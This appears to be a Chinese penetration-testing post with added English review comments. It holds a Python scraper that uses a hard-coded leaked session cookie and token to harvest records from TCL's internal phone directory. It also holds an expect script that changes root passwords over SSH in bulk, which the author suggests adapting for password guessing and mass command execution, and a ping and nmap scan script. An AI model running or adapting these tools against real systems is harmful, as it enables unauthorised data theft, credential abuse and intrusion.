referer:http://wooyun.org/bugs/wooyun-2015-0141726
#coding:utf-8
import re
import urllib2
import threading
import time
# Page-number bounds shared by every worker thread: main() counts `end` down
# until it reaches `start`, so pages end-1 .. start are requested.
start, end = 1, 880
def getContent(respInfo):
    """Pull the first flashvars value out of a response body and store it.

    respInfo is the page HTML with CR/LF already stripped by request().
    The value ',,,,, ' is treated as an empty record: "--" is printed and
    nothing is written. Any other value is appended to the output file
    through writeFile().
    """
    flashvars_regex = r'<param name="flashvars" value="(.*?)">'
    # The compiled pattern is stored as an attribute on the re module itself
    # (the original does the same), so it is visible process-wide.
    re.pattern1 = re.compile(flashvars_regex)
    found = re.pattern1.findall(respInfo)
    # NOTE(review): raises IndexError when the page has no flashvars param
    # (error page, expired session, changed markup).
    record = found[0]
    if info_is_blank(record) if False else record == ',,,,, ':
        print "--"
        return
    writeFile(record)
def writeFile(info):
    """Append one extracted record, terminated by CRLF, to tclinfo.txt.

    The file is opened in append mode in the current working directory, so
    repeated runs accumulate records in plain text. Anything collected this
    way is unprotected data at rest and should be handled accordingly.
    """
    with open("tclinfo.txt", 'a') as sink:
        sink.write(info + '\r\n')
def request(end):
    """Fetch ViewInfo.aspx for page number `end` and hand the body to getContent().

    The request carries a fixed User-Agent and a hard-coded session cookie.
    A session credential pasted into a published script must be treated as
    disclosed: the owning account's sessions should be invalidated
    server-side, not merely left to expire.

    Seen from the server, this is a single session walking the `page`
    parameter downward with an unchanging User-Agent. Per-session rate
    limits and alerts on sequential record access are the controls that
    notice this pattern.
    """
    print end
    try:
        target = "http://eip.tcl.com/phones/ViewInfo.aspx?RoleNo=0101&page=%s" % end
        rq = urllib2.Request(target)
        header_pairs = (
            ('User-Agent', "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 OPR/29.0.1795.60 (Edition Baidu)"),
            ('Accept', '*/*'),
            ('Cookie', 'ASP.NET_SessionId=1f44ueqbxxqb54fdk5lj4czv; LtpaToken=EndxvXShVNqSXQ1doiNyTvMWR6Y/X7J+5Bhs9cvrb541MCG5lJXu/8gxhhJlvnyfFYnGk2p+2thMr5a2qOpl7PaarQ5jSZySXsWUay1nPIUV0+0nsgDweLKsyM2p+w76P0onwZgcDBCObVl2N9wVdghK/nCZ3oGtbd+RAtA7j2ovVqxjJ4kDjy/UMML1tbb73c8zC6dPh05FI8ge89sqgnDwwhcVNaACG+fF7h7OCrEhJA1IQMSy9SCP8CrQ9Vw5Xs4IwXkzwyFptCgAxegMZIdhG92p9gRbNvdra43+SxsxUq3D+jW4jXxiWV5qCy9gifWfxqFx9sE1+mB3Q+nRG66+IT+meski/nD3KkRaBqq+b2HfL/gv7fDaVD5D15poiNtjAqip6KQ6MudME14VQtrw2NWyY6hg+G0IW+C55A5gsBBGbpuzJn8AS0a8kdAwTAECd1Vi1fBCKyPwGiHGAA=='),
        )
        for header_name, header_value in header_pairs:
            rq.add_header(header_name, header_value)
        reply = urllib2.urlopen(rq)
        # Line breaks are removed so the single-line regex in getContent() can match.
        body = reply.read().replace("\r", "").replace("\n", "")
    except:
        # NOTE(review): the bare except hides every failure, including
        # KeyboardInterrupt.
        pass
    finally:
        # NOTE(review): when the request above failed, `body` was never bound
        # and this line raises UnboundLocalError in the worker thread.
        getContent(body)
def main():
    """Worker loop: decrement the shared page counter and fetch each page.

    Every thread started by thread() runs this loop against the same
    module-level `end` without a lock. Two workers can therefore observe
    the same value, and page numbers may be requested twice or skipped.
    """
    global start, end
    while start < end:
        end -= 1
        request(end)
def thread():
    """Start one non-daemon worker thread running main(); it is not joined."""
    threading.Thread(target=main).start()
if __name__ == '__main__':
    # range(1, 10) yields nine values, so nine workers share the page counter.
    for _worker_no in range(1, 10):
        thread()
最近在做渗透时发现管理员的几个脚本,感觉还不错,以后可以改改用,这里分享一下
一、
批量改密码
#!/usr/bin/expect -f
# Log in to one host as root over SSH with the old password, set the new
# password with passwd, and record the host in success.log or fail.log.
# The first command-line argument is the address of the host.
set ip [lindex $argv 0 ]
# NOTE(review): both passwords are stored in the script in clear text, and the
# same new password is pushed to every host. Anyone who can read this file
# holds root on every machine it was run against. Key-based login and a
# per-host secret kept outside the script remove that single point of failure.
set password "aaaaa"
set oldpassword "bbbbbb"
# Seconds each expect waits for a pattern before giving up.
set timeout 10
spawn ssh root@$ip
# NOTE(review): the first branch answers "yes" to the host-key prompt, which
# accepts an unknown key without verification. A host impersonating the target
# would then be sent the old root password. Pre-populating known_hosts with
# verified keys avoids the prompt.
expect {
    "*yes/no" {
        send "yes\r";
        exp_continue
    }
    "*password:" {
        send "$oldpassword\r"
        expect {
            "*please try again" {
                # Login rejected: record the address and stop.
                # NOTE(review): $ip comes from argv and is spliced unquoted into
                # a sh -c command line, so a malformed entry in the input list
                # would be interpreted by the shell. Appending with Tcl's own
                # open/puts/close keeps the value out of a shell.
                exec sh -c "echo $ip >> fail.log"
                # Exit status is 0 even though the login failed, so the
                # caller cannot detect the failure from the status alone.
                exit 0
            }
        }
    }
}
# Wait for the root shell prompt.
expect "*#"
# Start passwd and answer its first password prompt with the new password.
send "passwd\r"
expect "*password:"
send "$password\r"
# Answer the confirmation prompt with the same value.
expect "*password:"
send "$password\r"
# Back at the prompt: close the session and wait for ssh to exit.
expect "*#"
send "exit\r"
expect eof
# Record the host as changed.
# NOTE(review): same unquoted sh -c interpolation of $ip as in the failure
# branch. This line is also reached without checking that passwd reported
# success.
exec sh -c "echo $ip >> success.log"
调用脚本:
#!/bin/bash
# Run autocmd.exp once for every whitespace-separated entry in ./ip.txt.
# NOTE(review): entries are expanded unquoted, so they undergo word splitting
# and globbing before they reach the expect script. ip.txt should contain
# nothing but validated addresses.
targets=$(cat ./ip.txt)
for host in $targets; do
    ./autocmd.exp $host
done
# Prints the status of the loop, i.e. of the last autocmd.exp run only.
echo $?
这个脚本从ip.txt里面读取ip,并使用oldpassword进行登录,登录以后执行修改密码操作,并把操作成功的ip记录到success.log中,登录失败的记录到fail.log中。
拓展到渗透:
1.修改脚本,批量测试口令;
2.修改脚本,批量登陆执行命令;
3.。。。。
二、批量对主机进行探测
#!/bin/sh
# Timestamp (yymmddHHMM) that names this run's log file.
DATE=$(date +%y%m%d%H%M)
# NOTE(review): the log name is predictable and lives in world-writable /tmp.
# When this runs as root, a pre-created symlink at that path redirects the
# appends to another file. mktemp or a root-owned log directory avoids that.
LOG=/tmp/netcheck$DATE.log

echo "==========PING CHECK=========="
# Each entry of ip.list is a comma-separated record; the first field is the address.
for entry in $(cat ip.list); do
    ip=$(echo "$entry" | cut -d"," -f1)
    # Two echo requests; a reply line containing ttl= counts as reachable.
    ping -c 2 $ip | grep -q 'ttl=' \
        && echo "$ip===the host's ping status is YES" >> "$LOG" 2>&1 \
        || echo "$ip===the host's ping status is NO.Please contact the administrator." >> "$LOG" 2>&1
done
echo "========PING CHECK END========"

echo "==========PORT CHECK=========="
for entry in $(cat ip.list); do
    ip=$(echo "$entry" | cut -d"," -f1)
    # -sS is a SYN scan and needs raw-socket privileges; -P0 skips host discovery.
    # NOTE(review): grep matches the word open anywhere in nmap's output, not
    # only in the port 22 state column. echo -e is not portable under /bin/sh.
    nmap -sS -P0 -p 22 $ip | grep -q "open" \
        && echo -e "$ip===the host's 22 port is open" >> "$LOG" 2>&1 \
        || echo -e "$ip==Tthe host's 22 port is closed,please contact the administrator." >> "$LOG" 2>&1
done
echo "========PORT CHECK END========"
输出格式啥的,自己改改吧。
希望对你有用~